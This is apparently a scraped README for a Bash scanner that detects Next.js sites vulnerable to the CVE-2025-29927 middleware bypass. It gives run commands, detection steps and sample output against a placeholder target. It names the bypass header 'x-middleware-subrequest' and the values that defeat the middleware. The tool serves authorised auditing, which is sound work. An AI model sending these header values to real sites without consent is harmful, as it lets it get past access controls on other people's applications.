
Verificador de exploit CVE-2025-29927
Ferramenta automatizada em Bash para detectar aplicações Next.js vulneráveis ao bypass de middleware CVE-2025-29927, de acordo com a pesquisa da Zhero Web Security.
bashwhatwebcurlInstale-os no Debian/Ubuntu com:
sudo apt install whatweb curl
./CVE-2025-29927.sh -u https://example.com
Crie um arquivo urls.txt com uma URL por linha:
https://target1.com
https://target2.com
Execute:
./nextjs_bypass_checker_v2.sh -l urls.txt
Identificação do Next.js
whatweb para detectar a tecnologia./_next/static/BUILD_ID e _buildManifest.js.Detecção de Middleware
X-Middleware-RewriteX-Middleware-Set-CookieTeste de bypass
x-middleware-subrequest e os cabeçalhos são detectados.[*] Analizando: https://victima.com
[+] WhatWeb:
-> Detectado: Next.js[12.2.0]
[+] BUILD_ID: 3fjd92hf8
[+] Versión detectada: 12.2.0
[+] Middleware activo (cabeceras detectadas):
X-Middleware-Rewrite: /not-found/locale=en
[+] Probando exploits:
-> x-middleware-subrequest: middleware -> ✅ BYPASS EXITOSO (cabeceras desaparecieron)
-> x-middleware-subrequest: src/middleware -> ❌ Middleware no evadido
[*] Finalizado: https://victima.com
Este script é para fins educacionais e de auditoria autorizada. Não o utilize contra alvos sem consentimento. O uso indevido pode constituir uma atividade ilegal.
Baseado na pesquisa de: Zhero Web Security